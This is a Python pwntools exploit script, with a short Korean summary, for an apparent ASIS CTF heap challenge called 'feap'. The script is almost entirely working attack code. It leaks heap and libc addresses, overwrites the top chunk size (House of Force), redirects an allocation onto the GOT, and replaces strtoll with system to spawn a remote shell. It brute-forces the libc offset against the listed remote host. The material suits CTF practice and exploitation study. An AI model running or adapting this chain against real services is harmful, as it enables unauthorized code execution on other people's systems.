힙쪽에 64바이트 오버플로우. topchunk 덮어서 malloc 조작한뒤 GOT 덮어서 쉘획득. (구체적으로: note body 오버플로우로 top chunk의 size 필드를 -1(0xffffffffffffffff)로 덮고 — House of Force — 다음 malloc의 크기를 `TARGET - heap_base - 0x218`로 넘겨 top 포인터를 GOT 바로 앞으로 옮긴 뒤, 그 다음 할당의 title 입력이 GOT 엔트리 위에 쓰이게 한다. 원격 libc의 fgets-system 오프셋은 알 수 없으므로 0x27be0부터 0x10씩 늘려가며 브루트포스한다.)
from pwn import *
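context.arch = 'amd64'  # i386 / arm

HOST, PORT = 'feap.asis-ctf.ir', 7331

# Where the House-of-Force allocation lands: the next note's title is written
# starting at this address, overwriting three consecutive 8-byte GOT slots.
TARGET = 0x602010
# Address whose contents leak a heap pointer (author's note: "heap address").
HEAP_PTR_ADDR = 0x6020a8
# GOT slot whose contents leak libc's fgets (author's label).
FGETS_GOT = 0x602048
# Note index given to the "print" menu; kept from the original run (not 0) —
# presumably the index the binary's lookup resolves to.  Verify if it stops
# working.
PRINT_IDX = 44

# (fgets - system) in the remote libc is unknown; start from the local libc's
# value and step by 0x10 until a shell answers.
DELTA = 0x27be0
DELTA_STEP = 0x10

# Shell probe: the command text never contains the marker that its output
# produces, so an echoed command line cannot give a false positive.
SHELL_PROBE = "echo FEAP''OK"
SHELL_MARKER = 'FEAPOK'
PROBE_TIMEOUT = 3


def _expect(r, marker):
    """Read up to and including *marker*, echoing the transcript as the original did."""
    data = r.recvuntil(marker)
    print(data)
    return data


def _menu(r, choice):
    """Wait for the main menu prompt and select *choice*."""
    _expect(r, '> ')
    r.sendline(str(choice))


def _create(r, size, title, body):
    """Menu 1: create a note of *size* with the given title and body."""
    _menu(r, 1)
    _expect(r, 'size: ')
    r.sendline(str(size))
    _expect(r, '63): ')
    r.sendline(title)
    _expect(r, '70): ')
    r.sendline(body)


def _edit(r, idx, field, data):
    """Menu 3: edit note *idx*; field 1 = title, 2 = body (the selector
    prompt ends in "body: ", then the field's own prompt follows)."""
    _menu(r, 3)
    _expect(r, 'edit: ')
    r.sendline(str(idx))
    _expect(r, 'body: ')
    r.sendline(str(field))
    _expect(r, 'title: ' if field == 1 else 'body: ')
    r.sendline(data)


def _print_note(r, idx):
    """Menu 5: print note *idx* and return the raw bytes shown as its Title.

    Because the title pointer has been replaced with an arbitrary address, the
    bytes between 'Title: ' and '\\nBody:' are the memory at that address, up to
    the first NUL.
    """
    _menu(r, 5)
    _expect(r, 'print: ')
    r.sendline(str(idx))
    out = r.recvuntil('\nBody:')
    return out.split('Title: ')[1].split('\nBody:')[0]


def _le_qword(data):
    """Decode a little-endian leak of 1..8 bytes as an unsigned integer.

    A %s-style leak stops at the first NUL, so fewer than 8 bytes usually come
    back; zero-pad on the right.  An empty leak is an error (the original
    raised ValueError here too), so the caller retries with the next delta.
    """
    if not data:
        raise ValueError('empty leak')
    return u64(data.ljust(8, '\x00'))


def _house_of_force(r, heap_base):
    """Move the top chunk so the next allocation returns TARGET.

    0x218 is the author's measured distance from the page-aligned heap base to
    the top chunk after the first note (presumably including chunk headers).
    The request is normally negative, since the heap lies above the non-PIE
    data segment; the binary's size conversion (strtoll, per the author's
    labels) turns it into a huge size_t, which the 0xff..ff top size accepts,
    and the top pointer wraps around to TARGET.
    """
    req = TARGET - heap_base - 0x218
    print(str(req))
    _menu(r, 1)
    _expect(r, 'size: ')
    r.sendline(str(req))
    _expect(r, '63): ')
    r.sendline('lol')
    # As in the original run, no body prompt is awaited here; the next menu
    # read consumes whatever the binary prints after this allocation.


def _exploit_once(r, delta):
    """Run the full chain on an open connection with one (fgets - system) guess.

    Returns True if a shell answered the probe, False if the guess was wrong
    but the connection is still alive; raises (EOFError etc.) if the remote
    died, which the caller treats as a wrong guess as well.
    """
    # 1. note 0 with its title pointing at a global that holds a heap pointer;
    #    printing it leaks that pointer.
    _create(r, 70, pack(HEAP_PTR_ADDR), 'nah')
    heap_ptr = _le_qword(_print_note(r, PRINT_IDX))
    # Page-align.  The original used `& 0xFFFFF000`, which also truncates the
    # address to 32 bits; `~0xFFF` is the same for this target and correct for
    # any 64-bit heap address.
    heap_base = heap_ptr & ~0xFFF
    print('heap base : {0}'.format(hex(heap_base)))

    # 2. repoint note 0's title at a GOT slot and print again: libc leak.
    _edit(r, 0, 1, pack(FGETS_GOT))
    fgets = _le_qword(_print_note(r, PRINT_IDX))
    print('fgets : {0}'.format(hex(fgets)))
    system = fgets - delta

    # 3. heap overflow via the body: 72 filler bytes reach the top chunk's size
    #    field, which becomes 0xffffffffffffffff (-1) so any request fits.
    _edit(r, 0, 2, '\x41' * 72 + '\xFF' * 8)

    # 4. House of Force: park the top chunk just before the GOT slots.
    _house_of_force(r, heap_base)

    # 5. The next malloc(70) returns TARGET, so this title overwrites three
    #    GOT slots.  Author's labels: +0 __libc_start_main (unused after
    #    startup, so junk is fine), +8 fgets, +0x10 strtoll -> system.
    #    NOTE(review): the libc leak above was read from 0x602048, which the
    #    author also calls fgets; both cannot be fgets's slot, so treat the
    #    labels as the author's.  What matters is that TARGET+0x10 is the slot
    #    called on the size input and TARGET+8 gets a valid libc address.
    #    A leaked address containing 0x0a would be cut short by the line-based
    #    read; that attempt then simply fails and the loop moves on.
    payload = 'AAAAAAAA'     # libc_start
    payload += pack(fgets)   # fgets
    payload += pack(system)  # strtoll
    _create(r, 70, payload, 'CCC')

    # 6. trigger: menu 1 converts the size input with strtoll@GOT, which is now
    #    system(); the trailing ';' terminates the command before any garbage.
    _menu(r, 1)
    _expect(r, 'size: ')
    r.sendline('/bin/sh;')

    # 7. probe instead of dropping straight into interactive(): on a wrong
    #    delta the remote usually dies (EOFError) or never answers (timeout,
    #    recvuntil returns empty), and the loop tries the next value.
    r.sendline(SHELL_PROBE)
    return bool(r.recvuntil(SHELL_MARKER, timeout=PROBE_TIMEOUT))


def _try_delta(delta):
    """Connect, run one attempt, hand over an interactive shell on success.

    The connection is always closed, so failed attempts do not leak sockets
    across the brute-force loop.
    """
    r = remote(HOST, PORT)
    # r = process(['./feap'])
    # raw_input('attach')
    try:
        ok = _exploit_once(r, delta)
        if ok:
            r.interactive()
        return ok
    finally:
        r.close()


while True:
    print(hex(DELTA))
    try:
        if _try_delta(DELTA):
            break
    except Exception as exc:
        # Wrong guess (EOF, timeout, unparsable leak) or a connection error.
        # KeyboardInterrupt/SystemExit are deliberately NOT caught, unlike the
        # original bare `except:`, so Ctrl-C actually stops the loop.
        print('[-] delta {0} failed: {1!r}'.format(hex(DELTA), exc))
    DELTA += DELTA_STEP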